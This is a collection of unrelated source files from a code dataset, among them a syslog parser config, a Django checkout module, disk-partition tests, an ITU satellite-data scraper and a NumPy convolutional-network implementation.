ValueError('Unable to parse event from %s[%s:%s]' %\n (src_file, offset_b, offset_e))\n usec = match.group('usec')\n usec = int(usec) if usec is not None else 0\n timestamp = datetime(\n year=int(match.group('year')),\n month=int(match.group('month')),\n day=int(match.group('day')),\n hour=int(match.group('hour')),\n minute=int(match.group('min')),\n second=int(match.group('sec')),\n microsecond=usec)\n event = {\n 'src_file': src_file,\n 'offset_b': offset_b,\n 'offset_e': offset_e,\n 'tag': tag,\n 'severity': match.group('severity').lower(),\n 'timestamp': timestamp,\n 'payload': {\n 'facility_number': int(match.group('facility')),\n 'message': match.group('message'),\n },\n }\n pid = match.group('pid')\n if pid is not None:\n event['payload']['pid'] = int(pid)\n return event\n\n\nclass SyslogJSONParser(SyslogParser):\n RE = re.compile(SyslogParser.PATTERN, flags=re.DOTALL)\n\n def __call__(self, src_file, offset_b, offset_e, raw):\n event = super(SyslogJSONParser, self).__call__(src_file, offset_b, offset_e, raw)\n event['payload']['message'] = json.loads(event['payload']['message'])\n return event\n\n\nclass ElasticSearchSink(object):\n def __init__(self, server, index, type):\n from pyes import ES\n self.cxn = ES(server)\n self.index = index\n self.type = type\n\n def __call__(self, event):\n if isinstance(event, list):\n self.cxn.bulk_size = len(event)\n for e in event:\n self.cxn.index(e, self.index, self.type, bulk=True)\n self.cxn.flush_bulk()\n else:\n self.cxn.index(event, self.index, self.type)\n\n\nELASTIC_SEARCH_SERVER = '127.0.0.1:9200'\n\n\nCONSUMERS = [\n # app-access\n {'name': 'app-access',\n 'block_terminal': AccessParser.BLOCK_TERMINAL,\n 'event_parser': AccessParser(),\n 'event_sink': slurp.print_sink,\n 'batch_size': 256,\n 'backfill': False,\n 'patterns': [\n re.compile(fnmatch.translate('*access.log*')),\n ],\n },\n\n # app-error\n {'name': 'app-error',\n 'block_preamble': ErrorParser.BLOCK_PREAMBLE_RE,\n 'block_terminal': ErrorParser.BLOCK_TERMINAL,\n 'event_parser': ErrorParser(),\n 'event_sink': slurp.print_sink,\n 'backfill': True,\n 'patterns': [\n re.compile(fnmatch.translate('*errors.log*')),\n ],\n },\n\n # app-request\n {'name': 'app-request',\n 'block_preamble': SyslogJSONParser.BLOCK_PREAMBLE_RE,\n 'block_terminal': SyslogJSONParser.BLOCK_TERMINAL,\n 'event_parser': SyslogJSONParser(),\n 'event_sink': slurp.print_sink,\n 'backfill': True,\n 'patterns': [\n re.compile(fnmatch.translate('*requests.log*')),\n ],\n },\n\n # sys\n {'name': 'sys',\n 'block_preamble': SyslogParser.BLOCK_PREAMBLE_RE,\n 'block_terminal': SyslogParser.BLOCK_TERMINAL,\n 'event_parser': SyslogParser(),\n 'event_sink': slurp.print_sink,\n 'batch_size': 4096,\n 'backfill': False,\n 'patterns': [\n re.compile(fnmatch.translate('*/boot.log')),\n re.compile(fnmatch.translate('*/cron')),\n re.compile(fnmatch.translate('*/haproxy')),\n re.compile(fnmatch.translate('*/mail')),\n re.compile(fnmatch.translate('*/messages')),\n re.compile(fnmatch.translate('*/secure')),\n re.compile(fnmatch.translate('*/postgres')),\n ],\n },\n ]\n","sub_path":"extras/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":8925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"358256441","text":"from django.db.models import Max\n\nfrom ..models import Orders, OrderDetails, ShoppingCart, Customers, Address, Products\nfrom django.utils import timezone\nfrom .CartOps import clearCart\nfrom django.template.loader import render_to_string\nfrom django.core.mail import send_mail, EmailMultiAlternatives\nfrom ..models import OrderDetails\n\ndef createOrder(request):\n date = timezone.now().date()\n status = \"Verwerkt\"\n\n if not request.user.is_authenticated:\n custID = createCustomer(request)\n else:\n custID = request.user.id\n\n orderEntry = Orders(orderNum=getNewOrderNum(), orderDate=date, orderStatus=status, customerID=Customers(customerID=custID))\n orderEntry.save()\n for e in ShoppingCart.objects.all().filter(session_key=request.session.session_key):\n orderDetailsEntry = OrderDetails(amount=e.amount, orderNum=Orders(orderNum=orderEntry.orderNum), productNum=e.prodNum)\n orderDetailsEntry.save()\n\n createAddress(request, custID) #Sla het adres op, of update deze indien nodig\n\n c = request.session['customer_email']\n\n order = OrderDetails.objects.all().filter(orderNum=Orders(orderNum=orderEntry.orderNum)) #Returnt een Array van alle Items die besteld zijn\n html_content = render_to_string('mail/order_complete_email.html', { \"order\" : order })\n text_content = render_to_string('mail/order_complete_email.txt')\n\n for i in order:\n print(\"________________\")\n print(\"Dit is Productnum: \", i.productNum.prodNum)\n print(\"Dit is Amount\", str(i.amount))\n\n prod = Products.objects.get(prodNum=str(i.productNum))\n print(\"Current Stock: \", prod.prodStock)\n prod.prodStock = prod.prodStock - i.amount\n prod.save()\n print(\"New Stock: \", Products.objects.get(prodNum=str(i.productNum)).prodStock)\n\n\n email = EmailMultiAlternatives(\"Orderbevestiging\", text_content, 'noreply@comicfire.com', [c])\n email.attach_alternative(html_content, \"text/html\")\n # email.attach_file('static/images/comicfirelogo2.png')\n email.mixed_subtype = 'related'\n\n email.send()\n\n clearCart(request) #Maak de shoppingcart weer leeg\n\ndef getNewOrderNum():\n maxC = Orders.objects.all().aggregate(Max('orderNum'))\n if maxC.get('orderNum__max') == None:\n return 1\n else:\n return maxC.get('orderNum__max') + 1\n\ndef createCustomer(request):\n customerEntry = Customers(customerID=getNewCustomerNum(), email=request.session['customer_email'], name=request.session['customer_fname'], surname=request.session['customer_lname'], telephone=request.session['customer_phone'], isRegistered=False)\n customerEntry.save()\n return customerEntry.customerID\n\ndef getNewCustomerNum():\n maxC = Customers.objects.all().aggregate(Max('customerID'))\n if maxC.get('customerID__max') == None:\n return 1\n else:\n return maxC.get('customerID__max') + 1\n\ndef createAddress(request, custID):\n if request.user.is_authenticated:\n updateAddress(request, custID)\n else:\n addressEntry = Address(address=request.session['customer_address'], number=request.session['customer_adressnum'], city=request.session['customer_city'], postalcode=request.session['customer_postalcode'], customerID=Customers(customerID=custID))\n addressEntry.save()\n\ndef updateAddress(request, custID):\n if not Address.objects.filter(customerID=Customers(customerID=custID)).exists():\n newEntry = Address(address=request.session['customer_address'], number=request.session['customer_adressnum'], city=request.session['customer_city'], postalcode=request.session['customer_postalcode'], customerID=Customers(customerID=custID))\n newEntry.save()\n else:\n existingEntry = Address.objects.get(customerID=Customers(customerID=custID))\n existingEntry.address = request.session['customer_address']\n existingEntry.number=request.session['customer_adressnum']\n existingEntry.city=request.session['customer_city']\n existingEntry.postalcode=request.session['customer_postalcode']\n existingEntry.save()\n\ndef createProduct(request):\n productEntry = Products(prodNum=getNewProductNum(), prodName=request.session['products_prodName'], prodPrice=request.session['products_prodPrice'], prodStock=request.session['products_prodStock'])\n productEntry.save()\n return productEntry.prodNum\n\ndef getNewProductNum():\n maxP = Products.objects.all().aggregate(Max('prodNum'))\n if maxP.get('prodNum__max') == None:\n return 1\n else:\n return maxP.get('prodNum__max') + 1\n\n# def createProductDetails(request, custID):\n# if request.user.is_authenticated:\n# updateAddress(request, custID)\n# else:\n# addressEntry = Address(address=request.session['customer_address'], number=request.session['customer_adressnum'], city=request.session['customer_city'], postalcode=request.session['customer_postalcode'], customerID=Customers(customerID=custID))\n# addressEntry.save()","sub_path":"website/store/database/CheckoutOps.py","file_name":"CheckoutOps.py","file_ext":"py","file_size_in_byte":4979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"285538396","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport pytest\n\nfrom octane import magic_consts\nfrom octane.util import disk as disk_util\n\n\n@pytest.mark.parametrize(\"disk\", [\"sda\", \"sdb\", \"sdc\"])\n@pytest.mark.parametrize(\"size,last_part,end_part\", [\n (10, 1024, 1035),\n (0, 10, 11),\n])\ndef test_create_partition(mocker, mock_ssh_call, mock_ssh_call_output, node,\n size, last_part, end_part, disk):\n mock_part_end = mocker.patch(\"octane.util.disk.parse_last_partition_end\")\n mock_part_end.return_value = last_part\n\n disk_util.create_partition(disk, size, node)\n mock_ssh_call_output.assert_called_once_with(\n ['parted', '/dev/%s' % disk, 'unit', 'MB', 'print'], node=node)\n mock_ssh_call.assert_called_once_with(\n ['parted', '/dev/%s' % disk, 'unit', 'MB', 'mkpart',\n 'custom', 'ext4', str(last_part + 1), str(end_part)], node=node)\n\n\nNODE_DISKS_ATTRIBUTE = [\n {\n 'id': '1',\n 'name': 'disk1',\n }, {\n 'id': '2',\n 'name': 'disk2',\n }\n]\n\n\n@pytest.mark.parametrize(\"disk_attrs\", [\n NODE_DISKS_ATTRIBUTE,\n None,\n])\ndef test_create_configdrive_partition(mocker, node, disk_attrs):\n name = 'disk1'\n node.mock_add_spec(['get_attribute'])\n node.data = {\"id\": \"1\"}\n node.get_attribute.return_value = disk_attrs\n mock_create_part = mocker.patch(\"octane.util.disk.create_partition\")\n if disk_attrs:\n disk_util.create_configdrive_partition(node)\n mock_create_part.assert_called_once_with(\n name, magic_consts.CONFIGDRIVE_PART_SIZE, node)\n else:\n with pytest.raises(disk_util.NoDisksInfoError):\n disk_util.create_configdrive_partition(node)\n","sub_path":"octane/tests/test_util_disk.py","file_name":"test_util_disk.py","file_ext":"py","file_size_in_byte":2198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"572562788","text":"\"\"\"A module defining the various toolchain definitions for `rules_foreign_cc`\"\"\"\n\nload(\":built_toolchains.bzl\", _built_toolchains = \"built_toolchains\")\nload(\":prebuilt_toolchains.bzl\", _prebuilt_toolchains = \"prebuilt_toolchains\")\n\n# Re-expose the built toolchains macro\nbuilt_toolchains = _built_toolchains\n\n# Re-expose the prebuilt toolchains macro\nprebuilt_toolchains = _prebuilt_toolchains\n\n# buildifier: disable=unnamed-macro\ndef preinstalled_toolchains():\n \"\"\"Register toolchains for various build tools expected to be installed on the exec host\"\"\"\n native.register_toolchains(\n str(Label(\"//toolchains:preinstalled_cmake_toolchain\")),\n str(Label(\"//toolchains:preinstalled_make_toolchain\")),\n str(Label(\"//toolchains:preinstalled_ninja_toolchain\")),\n )\n","sub_path":"toolchains/toolchains.bzl","file_name":"toolchains.bzl","file_ext":"bzl","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"304505612","text":"#!/bin/python3\n\"\"\"This script retrieves csv file with the list of satellites,\nand Excel files with their parameters \n\"\"\"\n\nfrom bs4 import BeautifulSoup\nimport requests\nimport pandas as pd\nimport xlwt\nimport os.path\n\nsave_path = '/home/rustam/MyGit/Downloaded Data'\n\nsatlist_url = \"https://www.itu.int/online/snl/freqrnge_snl.sh?plan=&lblfreq1=Frequency+%5BMHz%5D%3A+&lblfreq11=+from+&freq_low=0&lblfreq2=+to+&freq_hi=100000&lblemi0=Emission%2FReception%3A+&lblemi1=Emission+&lblemi2=Reception+&emi=&lblemi3=All+&lbllong1=Longitude%3A+&lbllong2=+from+&long_from=-180&lbllong3=+%A0+%A0+to++&long_to=180&lblstn=Space+or+Earth%3A+&lblcateg1=Geostationary&categ=N&lblcateg2=Non-geostationary&lblcateg3=Earth+station&lblsub=Submission+reason%3A+&lblsub1=API&lblsub2=Coordination&lblsub3=Notification&ntf=&lblsub4=All&sub0=Select&ie=y\"\n\n# the search result from ITU website\n\nraw_html_data = requests.get(satlist_url).text\nsoup = BeautifulSoup(raw_html_data,\"html.parser\")\n\n#print(soup.prettify())\n\ntable1 = soup.find_all('table')[1]\nsat_rows = table1.find_all('tr')[0:]\nsat_names = [] # a list to store all names of satellites\nurls = [] # a list to store links to pages with satellite parameters\nprint ('Number of satellites = ', len(sat_rows))\n\n# getting satellite names from table1\nfor i in range(2,len(sat_rows)-2):\n sat_rows[i].find_all('td',text=True)\n #len(sat_rows[i].find_all('td',text=True))\n sat_names.append((sat_rows[i].find_all('td',text=True))[1].get_text())\n sat_names.append(str((sat_rows[i].find_all('td',text=True))[1].get_text()))\n\n\nfor link in soup.findAll('a', href=True, text='view'):\n urls.append('http://www.itu.int' + link['href'])\n\ndel sat_names[::2] \n\n\n\n# print('\\n'.join(sat_names))\n# print('\\n'.join(urls)) \n\n\ntest_url = \"http://www.itu.int/online/snl/satbandold_snl.sh?ntc_id=115500120&fr1=2000&fr2=8000&ie=y&sat_type=&sat_name=SAUDISAT-6&sel_satname=SAUDISAT-6&plan_id=\"\n\ntest_sat = 'SAUDISAT-6'\n\n\ndef parse_sat_params(url, name):\n\t\"\"\"This function reads url and name of the satellite, opens the url and saves all parameters to the Excel file with the name of satellite + xls extention\n\t\n\t\"\"\"\n\tr = requests.get(url)\n\tdata = r.text.encode('utf-8')\n\tsoup = BeautifulSoup(data,\"html.parser\")\n\n\ttable = soup.find_all('table')[0]\n\trows = table.find_all('tr')[0:]\n\n\t# print(rows)\n\t#print(\"\\n\")\n\n\trow = []\n\tcolumn_names = []\n\n\tNumLines = len(rows) - 2\n\n\t\n\n\tworkbook = xlwt.Workbook()\n\tsheet1 = workbook.add_sheet('Parameters')\n\n\n\tfor i in range(0,7):\n\t\tcolumn_names.append(((rows[1].find_all('td',text=True))[i].get_text())) # line with names of columns\n\t\tsheet1.write(0, i, column_names[i]) \n\n\t\tj = 0\n\n\t\twhile( j < (NumLines - 1) ):\n\t\t\trow.append([])\n\t\t\trow[j].append( [ (rows[j + 3].find_all('td',text=True))[i].get_text() ] ) # first line with data\n\t\t\tsheet1.write(j+1, i, row[j][i])\n\t\t\tj += 1\n\n\tcompleteName = os.path.join(save_path, name + \".xls\")\n\tworkbook.save(completeName)\n\n\nparse_sat_params(test_url, test_sat)\n\n\nfor i in range(76, len(sat_rows)):\n try: \n \tparse_sat_params(urls[i], sat_names[i])\n \tprint ('loaded data of ', sat_names[i], ' satellite... #', i)\n except:\n \tprint ('failed to load date of', sat_names[i], ' satellite... #', i)","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":3203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"54037863","text":"# -*- coding: utf-8 -*-\n# © 2016 OpenSynergy Indonesia\n# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl.html).\n\nfrom odoo import fields, models\n\n\nclass StockPickingType(models.Model):\n _inherit = 'stock.picking.type'\n move_type=fields.Char(String='move type')\n\n","sub_path":"e2yun_addons/odoo12/srm_base/models/stock_picking_type.py","file_name":"stock_picking_type.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"199395689","text":"import numpy as np\r\n# 获取卷积区域\r\ndef get_patch(input_array,i,j,filter_width,filter_height,stride):\r\n '''\r\n 从输入数组中获取本次卷积的区域,\r\n 自动适配输入为2D和3D的情况\r\n '''\r\n start_i=i*stride\r\n start_j=j*stride\r\n if input_array.ndim==2:\r\n return input_array[start_i:start_i+filter_height,start_j:start_j+filter_width]\r\n elif input_array.ndim==3:\r\n return input_array[:,start_i:start_i+filter_height,start_j:start_j+filter_width]\r\n# 卷积层\r\nclass ConvLayer(object):\r\n # 在构造函数中设置卷积层的超参数\r\n # input_width:输入宽度 unput_height:输入高度 channel_number:深度 filter_width:filter宽度 filter_height:filter高度 filtet_number:filter个数\r\n # zero_padding:原始图像周围补几圈0, 1是补一圈0 stride:步幅 activator:激活函数 learning_rate:学习率 output_array:输出队列\r\n def __init__(self,input_width,input_height,channel_number,filter_width,filter_height,filter_number,zero_padding,stride,activator,learning_rate):\r\n self.input_width=input_width\r\n self.input_height=input_height\r\n self.channel_number=channel_number\r\n self.filter_width=filter_width\r\n self.filter_height=filter_height\r\n self.filter_number=filter_number\r\n self.zero_padding=zero_padding\r\n self.stride=stride\r\n self.output_width=ConvLayer.calculate_output_size(self.input_width,filter_width,zero_padding,stride)\r\n self.output_height=ConvLayer.calculate_output_size(self.input_height,filter_height,zero_padding,stride)\r\n # 三维矩阵 (深度,行数,列数)\r\n self.output_array=np.zeros((self.filter_number,self.output_height,self.output_width))\r\n # filter的个数 每个filter都有长度宽度深度三部分\r\n self.filters=[]\r\n for i in range(filter_number):\r\n self.filters.append(Filter(filter_width,filter_height,self.channel_number))\r\n self.activator=activator\r\n self.learning_rate=learning_rate\r\n # 静态方法不需要经过实例化就可以调用,==普通方法\r\n @staticmethod\r\n # 计算输出举证的长度和宽度\r\n def calculate_output_size(input_size,filter_size,zero_padding,stride):\r\n return int((input_size-filter_size+2*zero_padding)/stride+1)\r\n def forward(self,input_array):\r\n '''\r\n 计算卷积层的输出\r\n 输出结果保存在self.output_array\r\n '''\r\n self.input_array=input_array\r\n self.padded_input_array=padding(input_array,self.zero_padding)\r\n for f in range(self.filter_number):\r\n filter=self.filters[f]\r\n conv(self.padded_input_array,filter.get_weights(),self.output_array[f],self.stride,filter.get_bias())\r\n # 调用激活函数 修改矩阵的值(其实是减少for循环)\r\n element_wise_op(self.output_array,self.activator.forward)\r\n def backward(self,input_array,sensitivity_array,activator):\r\n '''计算传递给前一层的误差项,以及计算每个权重的提前一层的误差项保存在self.delta_array 梯度保存在Filter对象的weights_grad'''\r\n self.forward(input_array)\r\n # 计算input的误差项\r\n self.bp_sensitivity_map(sensitivity_array,activator)\r\n # 计算filter的误差项\r\n self.bp_gradient(sensitivity_array)\r\n # 根据这一层的误差项求上一层的误差项\r\n def bp_sensitivity_map(self,sensitivity_array,activator):\r\n '''\r\n 计算传递到上一层的sensitivity map\r\n sensitivity_array: 本层的sensitivity map\r\n activator: 上一层的激活函数\r\n '''\r\n # 处理卷积步长,对原始sensitivity map进行扩展\r\n expanded_array=self.expand_sensitivity_map(sensitivity_array)\r\n # full卷积,对sensitivitiy map进行zero padding\r\n # 虽然原始输入的zero padding单元也会获得残差\r\n # 但这个残差不需要继续向上传递,因此就不计算了\r\n expanded_width=expanded_array.shape[2]\r\n # sensitive map zp的计算公式(zp 补0的圈数)\r\n zp=int((self.input_width+self.filter_width-1-expanded_width)/2)\r\n padded_array=padding(expanded_array,zp)\r\n # 初始化delta_array,用于保存传递到上一层的sensitivity map\r\n self.delta_array=self.create_delta_array()\r\n # 对于具有多个filter的卷积层来说,最终传递到上一层的\r\n # sensitivity map相当于所有的filter的sensitivity map之和\r\n for f in range(self.filter_number):\r\n filter=self.filters[f]\r\n # 将filter权重翻转180度(逆时针)\r\n flipped_weights=np.array(list(map(lambda i:np.rot90(i,2),filter.get_weights())))\r\n # 计算与一个filter对应的delta_array\r\n delta_array=self.create_delta_array()\r\n for d in range(delta_array.shape[0]):\r\n conv(padded_array[f],flipped_weights[d],delta_array[d],1,0)\r\n self.delta_array+=delta_array\r\n # 将计算结果与激活函数的偏导数做element-wise乘法操作\r\n derivative_array=np.array(self.input_array)\r\n element_wise_op(derivative_array,activator.backward)\r\n # 求出上一层的sensitivity map\r\n self.delta_array*=derivative_array\r\n # expand_sensitivity_map方法就是将步长为S的sensitivity map『还原』为步长为1的sensitivity map\r\n def expand_sensitivity_map(self,sensitivity_array):\r\n depth=sensitivity_array.shape[0]\r\n # 确定扩展后sensitivity map的大小\r\n # 计算stride为1时sensitivity map的大小\r\n expanded_width=(self.input_width-self.filter_width+2*self.zero_padding+1)\r\n expanded_height=(self.input_height-self.filter_height+2*self.zero_padding+1)\r\n # 构建新的sensitivity_map\r\n expand_array=np.zeros((depth,expanded_height,expanded_width))\r\n # 从原始的sensitivity map拷贝误差值\r\n for i in range(self.output_height):\r\n for j in range(self.output_width):\r\n i_pos=i*self.stride\r\n j_pos=j*self.stride\r\n expand_array[:,i_pos,j_pos]=sensitivity_array[:,i,j]\r\n return expand_array\r\n # create_delta_array是创建用来保存传递到上一层的sensitivity map的数组\r\n def create_delta_array(self):\r\n return np.zeros((self.channel_number,self.input_height,self.input_width))\r\n # 计算梯度\r\n def bp_gradient(self,sensitivity_array):\r\n # 处理卷积步长,对原始sensitivity map进行扩展\r\n expanded_array=self.expand_sensitivity_map(sensitivity_array)\r\n for f in range(self.filter_number):\r\n # 计算每个权重的梯度\r\n filter=self.filters[f]\r\n for d in range(filter.weights.shape[0]):\r\n conv(self.padded_input_array[d],expanded_array[f],filter.weights_grad[d],1,0)\r\n # 计算偏置项的梯度\r\n filter.bias_grad=expanded_array[f].sum()\r\n def update(self):\r\n '''\r\n 按照梯度下降,更新权重\r\n '''\r\n for filter in self.filters:\r\n filter.update(self.learning_rate)\r\n# 对numpy数组进行element wise操作 修改矩阵的值\r\ndef element_wise_op(array,op):\r\n for i in np.nditer(array,op_flags=['readwrite']):\r\n i[...]=op(i)\r\n# output_array是2D 求出output\r\ndef conv(input_array,kernel_array,output_array,stride,bias):\r\n '''计算卷积,自动适配输入为2D和3D的情况'''\r\n output_width=output_array.shape[1]\r\n output_height=output_array.shape[0]\r\n kernel_width=kernel_array.shape[-1]\r\n kernel_height=kernel_array.shape[-2]\r\n for i in range(output_height):\r\n for j in range(output_width):\r\n output_array[i][j]=(get_patch(input_array,i,j,kernel_width,kernel_height,stride)*kernel_array).sum()+bias\r\n# zp 表示要增加的圈数\r\n# 实现padding即实现要补几圈0 适配输入为2D和3D的情况\r\ndef padding(input_array,zp):\r\n '''维数组增加Zero padding,自动适配输入为2D和3D的情况'''\r\n if zp==0:\r\n return input_array\r\n else:\r\n # ndim数组的维度\r\n if input_array.ndim==3:\r\n # 行代表高 列代表宽\r\n input_width=input_array.shape[2]\r\n input_height = input_array.shape[1]\r\n input_depth = input_array.shape[0]\r\n padded_array=np.zeros((input_depth,input_height+2*zp,input_width+2*zp))\r\n padded_array[:,zp:zp+input_height,zp:zp+input_width]=input_array\r\n return padded_array\r\n elif input_array.ndim==2:\r\n input_width=input_array.shape[1]\r\n input_height=input_array.shape[0]\r\n padded_array=np.zeros((input_height+2*zp,input_width+2*zp))\r\n padded_array[zp:zp+input_height,zp:zp+input_width]=input_array\r\n return padded_array\r\nclass Filter(object):\r\n def __init__(self,width,height,depth):\r\n # weight 权重 bias 偏置项\r\n self.weights=np.random.uniform(-1e-4,1e-4,(depth,height,width))\r\n self.bias=0\r\n # filter的误差项\r\n self.weights_grad=np.zeros(self.weights.shape)\r\n # filter偏置项的误差项\r\n self.bias_grad=0\r\n def __repr__(self):\r\n return 'filter weights:\\n%s\\nbias:\\n%s' % (repr(self.weights), repr(self.bias))\r\n def get_weights(self):\r\n return self.weights\r\n def get_bias(self):\r\n return self.bias\r\n # 用梯度下降算法跟新权重\r\n def update(self,learning_rate):\r\n self.weights-=learning_rate*self.weights_grad\r\n self.bias-=learning_rate*self.bias_grad\r\n\r\n# 激活函数\r\nclass IdentityActivator(object):\r\n def forward(self, weighted_input):\r\n return weighted_input\r\n\r\n # 函数的导数\r\n def backward(self, output):\r\n return 1\r\n# 激活函数\r\nclass ReluActivator(object):\r\n def forward(self,weighted_input):\r\n return max(0,weighted_input)\r\n def backward(self,output):\r\n return 1 if output>0 else 0\r\n# 构建测试集合\r\ndef init_test():\r\n a = np.array(\r\n [[[0, 1, 1, 0, 2],\r\n [2, 2, 2, 2, 1],\r\n [1, 0, 0, 2, 0],\r\n [0, 1, 1, 0, 0],\r\n [1, 2, 0, 0, 2]],\r\n [[1, 0, 2, 2, 0],\r\n [0, 0, 0, 2, 0],\r\n [1, 2, 1, 2, 1],\r\n [1, 0, 0, 0, 0],\r\n [1, 2, 1, 1, 1]],\r\n [[2, 1, 2, 0, 0],\r\n [1, 0, 0, 1, 0],\r\n [0, 2, 1, 0, 1],\r\n [0, 1, 2, 2, 2],\r\n [2, 1, 0, 0, 1]]])\r\n # 是误差项\r\n b = np.array(\r\n [[[0,1,1],\r\n [2,2,2],\r\n [1,0,0]],\r\n [[1,0,2],\r\n [0,0,0],\r\n [1,2,1]]])\r\n # 初始化超参数\r\n cl = ConvLayer(5,5,3,3,3,2,1,2,IdentityActivator(),0.001)\r\n # 初始化filter的权重\r\n cl.filters[0].weights = np.array(\r\n [[[-1,1,0],\r\n [0,1,0],\r\n [0,1,1]],\r\n [[-1,-1,0],\r\n [0,0,0],\r\n [0,-1,0]],\r\n [[0,0,-1],\r\n [0,1,0],\r\n [1,-1,-1]]], dtype=np.float64)\r\n # 初始化filter 的偏置项\r\n cl.filters[0].bias=1\r\n cl.filters[1].weights = np.array(\r\n [[[1,1,-1],\r\n [-1,-1,1],\r\n [0,-1,1]],\r\n [[0,1,0],\r\n [-1,0,-1],\r\n [-1,1,0]],\r\n [[-1,0,0],\r\n [-1,0,1],\r\n [-1,0,0]]], dtype=np.float64)\r\n cl.filters[1].bias = 0\r\n return a, b, cl\r\ndef gradient_check():\r\n '''梯度检查'''\r\n # 设计一个误差函数,取所有节点输出项之和\r\n error_function=lambda o:o.sum()\r\n # 计算forward值\r\n a,b,cl=init_test()\r\n cl.forward(a)\r\n # 求取sensitivity map,是一个全1数组\r\n sensitivity_array = np.ones(cl.output_array.shape,\r\n dtype=np.float64)\r\n # 计算梯度\r\n cl.backward(a, sensitivity_array,IdentityActivator())\r\n # 检查梯度\r\n epsilon = 10e-4\r\n for d in range(cl.filters[0].weights_grad.shape[0]):\r\n for i in range(cl.filters[0].weights_grad.shape[1]):\r\n for j in range(cl.filters[0].weights_grad.shape[2]):\r\n cl.filters[0].weights[d,i,j] += epsilon\r\n cl.forward(a)\r\n err1 = error_function(cl.output_array)\r\n cl.filters[0].weights[d,i,j] -= 2*epsilon\r\n cl.forward(a)\r\n err2 = error_function(cl.output_array)\r\n expect_grad = (err1 - err2) / (2 * epsilon)\r\n cl.filters[0].weights[d,i,j] += epsilon\r\n print('weights(%d,%d,%d): expected - actural %f - %f' % (d, i, j, expect_grad, cl.filters[0].weights_grad[d,i,j]))\r\n# pooling层\r\nclass MaxPoolingLayer(object):\r\n def __init__(self,input_width,input_height,channel_number,filter_width,filter_height,stride):\r\n self.input_width=input_width\r\n self.input_height=input_height\r\n self.channel_number=channel_number\r\n self.filter_width=filter_width\r\n self.filter_height=filter_height\r\n self.stride=stride\r\n self.output_width=int((input_width-filter_width)/self.stride+1)\r\n self.output_height=int((input_height-filter_height)/self.stride+1)\r\n self.output_array=np.zeros((self.channel_number,self.output_height,self.output_width))\r\n def forward(self,input_array):\r\n for d in range(self.channel_number):\r\n for i in range(self.output_height):\r\n for j in range(self.output_width):\r\n self.output_array[d,i,j]=(get_patch(input_array[d],i,j,self.filter_width,self.filter_height,self.stride).max())\r\n def backward(self,input_array,sensitivity_array):\r\n self.delta_array=np.zeros(input_array.shape)\r\n for d in range(self.channel_number):\r\n for i in range(self.output_height):\r\n for j in range(self.output_width):\r\n patch_array=get_patch(input_array[d],i,j,self.filter_width,self.filter_height,self.stride)\r\n k,l=get_max_index(patch_array)\r\n self.delta_array[d,i*self.stride+k,j*self.stride+l]=sensitivity_array[d,i,j]\r\n\r\n\r\ndef test():\r\n a, b, cl = init_test()\r\n cl.forward(a)\r\n print(cl.output_array)\r\n\r\ndef test_bp():\r\n a, b, cl = init_test()\r\n cl.backward(a, b, IdentityActivator())\r\n cl.update()\r\n print(cl.filters[0])\r\n print(cl.filters[1])\r\n\r\ndef init_pool_test():\r\n a = np.array(\r\n [[[1,1,2,4],\r\n [5,6,7,8],\r\n [3,2,1,0],\r\n [1,2,3,4]],\r\n [[0,1,2,3],\r\n [4,5,6,7],\r\n [8,9,0,1],\r\n [3,4,5,6]]], dtype=np.float64)\r\n\r\n b = np.array(\r\n [[[1,2],\r\n [2,4]],\r\n [[3,5],\r\n [8,2]]], dtype=np.float64)\r\n\r\n mpl = MaxPoolingLayer(4,4,2,2,2,2)\r\n\r\n return a, b, mpl\r\n\r\n\r\ndef test_pool():\r\n a, b, mpl = init_pool_test()\r\n mpl.forward(a)\r\n print('input array:\\n%s\\noutput array:\\n%s' % (a,mpl.output_array))\r\n\r\n\r\ndef test_pool_bp():\r\n a, b, mpl = init_pool_test()\r\n mpl.backward(a, b)\r\n print('input array:\\n%s\\nsensitivity array:\\n%s\\ndelta array:\\n%s' % (a, b, mpl.delta_array))\r\n# 获取一个2D区域的最大值所在的索引\r\ndef get_max_index(array):\r\n max_i = 0\r\n max_j = 0\r\n max_value = array[0,0]\r\n for i in range(array.shape[0]):\r\n for j in range(array.shape[1]):\r\n if array[i,j] > max_value:\r\n max_value = array[i,j]\r\n max_i, max_j = i, j\r\n return max_i, max_j\r\nif __name__==\"__main__\":\r\n # gradient_check()\r\n # test_bp()\r\n # test_pool()\r\n test_pool_bp()","sub_path":"algorithm_learn/NeuralNetwork/ConvLayer.py","file_name":"ConvLayer.py","file_ext":"py","file_size_in_byte":15705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"412580562","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.5 (62131)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/globenet/paste/templates.py\n# Compiled at: 2008-08-26 14:23:46\nfrom __future__ import with_statement\nfrom paste.script import templates, command\nimport subprocess, os, yaml\n\nclass GlobenetTemplate(templates.Template):\n egg_plugins = [\n 'globenet']\n summary = 'Template for creating a basic globenet package'\n _template_dir = 'project'\n use_cheetah = True\n\n def post(self, command, output_dir, vars):\n subprocess.Popen(['python', 'bootstrap.py', '--no-site-packages', 'env'], cwd=output_dir)\n\n\nclass ControllerTemplate(templates.Template):\n egg_plugins = [\n 'globenet']\n summary = 'Template 